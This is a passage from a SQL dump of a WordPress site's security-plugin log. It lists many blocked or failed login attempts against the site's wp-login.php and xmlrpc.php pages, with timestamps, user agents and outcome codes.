Network',NULL),(10578,0.000000,1630790576.771740,'\0\0\0\0\0\0\0\0\0\0��g1?',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10579,0.000000,1630791403.647501,'\0\0\0\0\0\0\0\0\0\0����p�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10580,0.000000,1630792188.335176,'\0\0\0\0\0\0\0\0\0\0��.�`S',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10581,0.000000,1630792937.638446,'\0\0\0\0\0\0\0\0\0\0���I�-',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10582,0.000000,1630793686.977650,'\0\0\0\0\0\0\0\0\0\0��ϴ�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10583,0.000000,1630794439.345015,'\0\0\0\0\0\0\0\0\0\0���GY\\',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10584,0.000000,1630795203.100579,'\0\0\0\0\0\0\0\0\0\0���]�S',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10585,0.000000,1630796724.759495,'\0\0\0\0\0\0\0\0\0\0���E\"�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10586,0.000000,1630797489.925969,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10587,0.000000,1630797565.464956,'\0\0\0\0\0\0\0\0\0\0��>m\\',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10588,0.000000,1630798236.395118,'\0\0\0\0\0\0\0\0\0\0���;v�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10589,0.000000,1630798996.912807,'\0\0\0\0\0\0\0\0\0\0��_�+�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10590,0.000000,1630799764.469057,'\0\0\0\0\0\0\0\0\0\0��#��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10591,0.000000,1630800538.442830,'\0\0\0\0\0\0\0\0\0\0��ʽ��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10592,0.000000,1630801317.103767,'\0\0\0\0\0\0\0\0\0\0��_�� ',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10593,0.000000,1630802014.145104,'\0\0\0\0\0\0\0\0\0\0��%��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Python/3.8 aiohttp/3.7.4.post0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10594,0.000000,1630802087.585316,'\0\0\0\0\0\0\0\0\0\0��:��^',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10595,0.000000,1630802866.798462,'\0\0\0\0\0\0\0\0\0\0���>}�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10596,0.000000,1630803643.416519,'\0\0\0\0\0\0\0\0\0\0���cr5',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10597,0.000000,1630804418.345394,'\0\0\0\0\0\0\0\0\0\0��g�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10598,0.000000,1630805195.291978,'\0\0\0\0\0\0\0\0\0\0�����B',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10599,0.000000,1630805978.538419,'\0\0\0\0\0\0\0\0\0\0��ϴ�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10600,0.000000,1630806754.845034,'\0\0\0\0\0\0\0\0\0\0���D��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10601,0.000000,1630807538.574040,'\0\0\0\0\0\0\0\0\0\0���a�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10602,0.000000,1630808309.933761,'\0\0\0\0\0\0\0\0\0\0���E\"�',0,200,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10603,0.000000,1630809090.385684,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10604,0.000000,1630809864.775818,'\0\0\0\0\0\0\0\0\0\0����8�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10605,0.000000,1630810647.450827,'\0\0\0\0\0\0\0\0\0\0��ν�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10606,0.000000,1630812202.036978,'\0\0\0\0\0\0\0\0\0\0��>��q',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10607,0.000000,1630812955.926108,'\0\0\0\0\0\0\0\0\0\0����:',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10608,0.000000,1630812983.466449,'\0\0\0\0\0\0\0\0\0\0�����B',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10609,0.000000,1630813772.577363,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10610,0.000000,1630814550.641864,'\0\0\0\0\0\0\0\0\0\0��QX4r',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10611,0.000000,1630815335.541308,'\0\0\0\0\0\0\0\0\0\0��#�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10612,0.000000,1630816118.910126,'\0\0\0\0\0\0\0\0\0\0��Y`Z}',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10613,0.000000,1630816903.605026,'\0\0\0\0\0\0\0\0\0\0���}7�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10614,0.000000,1630817683.733746,'\0\0\0\0\0\0\0\0\0\0����\\�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10615,0.000000,1630819259.115738,'\0\0\0\0\0\0\0\0\0\0����*}',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10616,0.000000,1630820042.577376,'\0\0\0\0\0\0\0\0\0\0���aZ',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10617,0.000000,1630820826.858819,'\0\0\0\0\0\0\0\0\0\0���㪽',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10618,0.000000,1630821612.980859,'\0\0\0\0\0\0\0\0\0\0��3Kȷ',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10619,0.000000,1630822401.485600,'\0\0\0\0\0\0\0\0\0\0�����F',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10620,0.000000,1630823187.643260,'\0\0\0\0\0\0\0\0\0\0���>}�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10621,0.000000,1630823984.054265,'\0\0\0\0\0\0\0\0\0\0���㪽',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10622,0.000000,1630824770.317977,'\0\0\0\0\0\0\0\0\0\0��]qo6',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10623,0.000000,1630824862.566570,'\0\0\0\0\0\0\0\0\0\0��Ϛ�\\',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10624,0.000000,1630825564.034880,'\0\0\0\0\0\0\0\0\0\0��R@�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10625,0.000000,1630826366.431521,'\0\0\0\0\0\0\0\0\0\0��:��^',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10626,0.000000,1630827158.917272,'\0\0\0\0\0\0\0\0\0\0����\n',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10627,0.000000,1630827954.505038,'\0\0\0\0\0\0\0\0\0\0��^x�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10628,0.000000,1630828747.828846,'\0\0\0\0\0\0\0\0\0\0�����F',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10629,0.000000,1630829543.461046,'\0\0\0\0\0\0\0\0\0\0���=��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10630,0.000000,1630830337.453694,'\0\0\0\0\0\0\0\0\0\0���G',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10631,0.000000,1630831134.293893,'\0\0\0\0\0\0\0\0\0\0���/�\"',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10632,0.000000,1630831930.162198,'\0\0\0\0\0\0\0\0\0\0��_o�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10633,0.000000,1630832723.151449,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10634,0.000000,1630833519.636074,'\0\0\0\0\0\0\0\0\0\0��]qo6',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10635,0.000000,1630834318.512360,'\0\0\0\0\0\0\0\0\0\0���I�-',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10636,0.000000,1630835166.052847,'\0\0\0\0\0\0\0\0\0\0���h��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10637,0.000000,1630836019.299868,'\0\0\0\0\0\0\0\0\0\0����l',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10638,0.000000,1630836622.698700,'\0\0\0\0\0\0\0\0\0\0���$O',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','loginFailInvalidUsername',NULL,NULL),(10639,0.000000,1630838592.974738,'\0\0\0\0\0\0\0\0\0\0��N/ɏ',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10640,0.000000,1630848548.582438,'\0\0\0\0\0\0\0\0\0\0��^>�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10641,0.000000,1630860398.776827,'\0\0\0\0\0\0\0\0\0\0��%ۿ',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10642,0.000000,1630872135.621398,'\0\0\0\0\0\0\0\0\0\0��Xc��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10643,0.000000,1630874741.402324,'\0\0\0\0\0\0\0\0\0\0����g',0,503,0,0,0,'https://www.dogstardesign.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10644,0.000000,1630883909.573376,'\0\0\0\0\0\0\0\0\0\0���;�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','loginFailInvalidUsername',NULL,NULL),(10645,0.000000,1630887440.864311,'\0\0\0\0\0\0\0\0\0\0��-���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10646,0.000000,1630889365.936985,'\0\0\0\0\0\0\0\0\0\0��h�H�',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; MS-RTC LM 8; .NET4.0C)','loginFailInvalidUsername',NULL,NULL),(10647,0.000000,1630895728.163398,'\0\0\0\0\0\0\0\0\0\0��>m\\',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10648,0.000000,1630907594.368396,'\0\0\0\0\0\0\0\0\0\0��.i|b',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10649,0.000000,1630910733.563665,'\0\0\0\0\0\0\0\0\0\0��-���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Opera/9.80 (Windows NT 6.1; WOW64; MRA 8.0 (build 5990)) Presto/2.12.388 Version/12.15','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10650,0.000000,1630922368.453436,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','loginFailInvalidUsername',NULL,NULL),(10651,0.000000,1630934537.626203,'\0\0\0\0\0\0\0\0\0\0��Ϛ�\\',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10652,0.000000,1630945833.732619,'\0\0\0\0\0\0\0\0\0\0��.\'6�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(10653,0.000000,1630945835.673044,'\0\0\0\0\0\0\0\0\0\0��.\'6�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(10654,0.000000,1630945836.601887,'\0\0\0\0\0\0\0\0\0\0��.\'6�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(10655,0.000000,1630945837.542579,'\0\0\0\0\0\0\0\0\0\0��.\'6�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(10656,0.000000,1630945838.442288,'\0\0\0\0\0\0\0\0\0\0��.\'6�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(10657,0.000000,1630945839.320106,'\0\0\0\0\0\0\0\0\0\0��.\'6�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(10658,0.000000,1630946838.656123,'\0\0\0\0\0\0\0\0\0\0��\r�c�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','loginFailInvalidUsername',NULL,NULL),(10659,0.000000,1630989021.755325,'\0\0\0\0\0\0\0\0\0\0��gx�_',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10660,0.000000,1630989032.002901,'\0\0\0\0\0\0\0\0\0\0��gx�_',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10661,0.000000,1630989041.313031,'\0\0\0\0\0\0\0\0\0\0��gx�_',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10662,0.000000,1630989055.301480,'\0\0\0\0\0\0\0\0\0\0��gx�_',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10663,0.000000,1630989062.741556,'\0\0\0\0\0\0\0\0\0\0��gx�_',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 